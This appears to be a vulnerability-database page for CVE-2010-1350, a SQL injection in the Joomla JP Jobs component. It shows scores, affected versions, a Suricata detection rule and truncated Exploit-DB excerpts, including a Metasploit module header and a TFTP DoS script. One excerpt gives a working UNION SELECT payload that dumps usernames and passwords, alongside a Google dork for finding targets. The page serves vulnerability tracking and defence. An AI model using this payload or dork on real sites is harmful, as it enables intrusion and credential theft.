CVE-2010-1350
published 2010-04-12CVE-2010-1350: SQL injection vulnerability in the JP Jobs (com_jp_jobs) component 1.4.1 and earlier for Joomla! allows remote attackers to execute arbitrary SQL commands via…
PriorityP344high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.27%
66.1th percentile
SQL injection vulnerability in the JP Jobs (com_jp_jobs) component 1.4.1 and earlier for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a detail action to index.php.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomlaprojects | com_jp_jobs | <= 1.4.1 | — |
| joomlaprojects | com_jp_jobs | — | — |
| joomlaprojects | com_jp_jobs | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET WEB_SERVER HP OpenView /OvCgi/Toolbar.exe Accept Language Heap Buffer Overflow Attempt
suricata·2010-07-30
CVE-2009-0921 ET WEB_SERVER HP OpenView /OvCgi/Toolbar.exe Accept Language Heap Buffer Overflow Attempt
ET WEB_SERVER HP OpenView /OvCgi/Toolbar.exe Accept Language Heap Buffer Overflow Attempt
Rule: alert http1 $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER HP OpenView /OvCgi/Toolbar.exe Accept Language Heap Buffer Overflow Attempt"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/OvCgi/Toolbar.exe"; nocase; fast_pattern; http.header; content:"Accept-Language|3a 20|"; nocase; isdataat:1350,relative; content:!"|0A|"; within:1350; content:"Content-Length|3a|"; distance:0; reference:cve,2009-0921; classtype:web-application-attack; sid:2010864; rev:11; metadata:created_at 2010_07_30, cve CVE_2009_0921, confidence High, signature_severity Major, updated_at 2024_04_10;)
Exploit-DB
Oracle - Document Capture Insecure READ Method
exploitdb·2011-01-26·CVSS 7.8
CVE-2010-3595 [HIGH] Oracle - Document Capture Insecure READ Method
Oracle - Document Capture Insecure READ Method
---
Source: http://packetstormsecurity.org/files/view/97872/DSECRG-11-007.txt
Digital Security Research Group [DSecRG] Advisory DSECRG-11-007 (Internal #DSECRG-00117)
Application: Oracle Document Capture
Versions Affected: 10.1350.0005
Vendor URL: http://www.oracle.com/technology/software/products/content-management/index_dc.html
Bugs: Insecure READ method
Exploits: YES
Reported: 29.01.2010
Second report: 02.02.2010
Date of Public Advisory: 24.01.2010
CVE: CVE-2010-3595
Authors: Alexey Sintsov
by Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)
Description
EasyMail ActiveX Control (emsmtp.dll) that included into Oracle Document Capture distrib
can be used to read any file in target system. Vulnerable method is
Exploit-DB
Novell NetIdentity Agent - XTIERRPCPIPE Named Pipe Buffer Overflow (Metasploit)
exploitdb·2010-11-24
CVE-2009-1350 Novell NetIdentity Agent - XTIERRPCPIPE Named Pipe Buffer Overflow (Metasploit)
Novell NetIdentity Agent - XTIERRPCPIPE Named Pipe Buffer Overflow (Metasploit)
---
##
# $Id: netidentity_xtierrpcpipe.rb 11127 2010-11-24 19:35:38Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Novell's NetIdentity Agent. When sending
a specially crafted string to the 'XTIERRPCPIPE' named pipe, an attacker may be
able to execute arbitrary code. The success of this module is much greater once the
Exploit-DB
Joomla! Component JP Jobs 1.2.0 - 'id' SQL Injection
exploitdb·2010-04-13
CVE-2010-1350 Joomla! Component JP Jobs 1.2.0 - 'id' SQL Injection
Joomla! Component JP Jobs 1.2.0 - 'id' SQL Injection
---
) ) ) ( ( ( ( ( ) )
( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(
)\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())
((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ | |_ _|| \| | |/ /
\ V / (_) || (_ |\ V / / _ \ | (__ / _ \ | /| |) | _|| / |__ | | | .` | ' 1.2.0 it could be vulnerable
http://127.0.0.1/[path]/index.php?option=com_jp_jobs&view=detail&id=[SQLi]
http://127.0.0.1/[path]/index.php?option=com_jp_jobs&view=detail&id=-999999/**/union/**/all/**/select/**/1,2,group_concat(username,char(58),password)v3n0m,4,5,6,7,8,9,10,11,12,13,
Exploit-DB
Joomla! Component JP Jobs 1.4.1 - SQL Injection
exploitdb·2010-04-03
CVE-2010-1350 Joomla! Component JP Jobs 1.4.1 - SQL Injection
Joomla! Component JP Jobs 1.4.1 - SQL Injection
---
:: General information
:: Joomla component jp_jobs SQL Injection vulnerability
:: by Valentin Hoebel
:: [email protected]
:: Product information
:: Name = jp_jobs
:: Vendor = Joomla! Projects
:: Vendor Website = http://www.joomlanetprojects.com/
:: About the product = http://extensions.joomla.org/extensions/ads-a-affiliates/jobs-a-recruitment/11163
:: Affected versions = All, latest one is 1.4.1
:: Google dork: "inurl:index.php?option=com_jp_jobs"
:: SQL Injection vulnerability
The component is extremly useful when it comes down to implementing some sort of job portal into your Joomla website.
Injecting SQL commands while viewing details about a job is possible.
Vulnerable URL
http://some-cool-domain.tld/index.php?option=com_jp_j
Exploit-DB
Cisco TFTP Server 1.1 - Denial of Service
exploitdb·2010-03-25
CVE-2010-1174 Cisco TFTP Server 1.1 - Denial of Service
Cisco TFTP Server 1.1 - Denial of Service
---
# Exploit Title: [Cisco TFTP Server 1.1]
# Date: [2010-03-25]
# Author: [_SuBz3r0_]
# Software Link: [http://www.oldversion.com/Cisco_TFTP_Server.html]
# Version: [1.1]
# Tested on: [XP SP3,Win2k3]
# CVE : [if exists]
# Code :
#Cisco TFTP Server v1.1 DoS
print ""
print "##############################################"
print "# _SuBz3r0_ #"
print "##############################################"
print ""
print "Cisco TFTP v1.1 Remote DoS"
print "Just For Fun"
print "tftp_fuzz.py [ip of server]"
print ""
print "Greetz:piloo le canari & MaX"
print "Credits to Ilja van Sprundel"
print "Tested on: French Windows Xp Sp3 fully Patched"
print ""
#!/usr/bin/python
# tftpd fuzzer by Ilja van Sprundel
# implements rfc 1350, 2090, 2347, 2348, 2349
#
# tod
No writeups or analysis indexed.
http://packetstormsecurity.org/1004-exploits/joomlajpjobs-sql.txthttp://secunia.com/advisories/39325http://www.exploit-db.com/exploits/12037http://www.joomlanetprojects.com/index.php/en/joomla-projects-downloads/joomla-1/joomla-1/38-comjpjobs.htmlhttp://www.securityfocus.com/bid/39191http://www.xenuser.org/documents/security/joomla_com_jp_jobs_sql.txthttps://exchange.xforce.ibmcloud.com/vulnerabilities/57500http://packetstormsecurity.org/1004-exploits/joomlajpjobs-sql.txthttp://secunia.com/advisories/39325http://www.exploit-db.com/exploits/12037http://www.joomlanetprojects.com/index.php/en/joomla-projects-downloads/joomla-1/joomla-1/38-comjpjobs.htmlhttp://www.securityfocus.com/bid/39191http://www.xenuser.org/documents/security/joomla_com_jp_jobs_sql.txthttps://exchange.xforce.ibmcloud.com/vulnerabilities/57500
2010-04-12
Published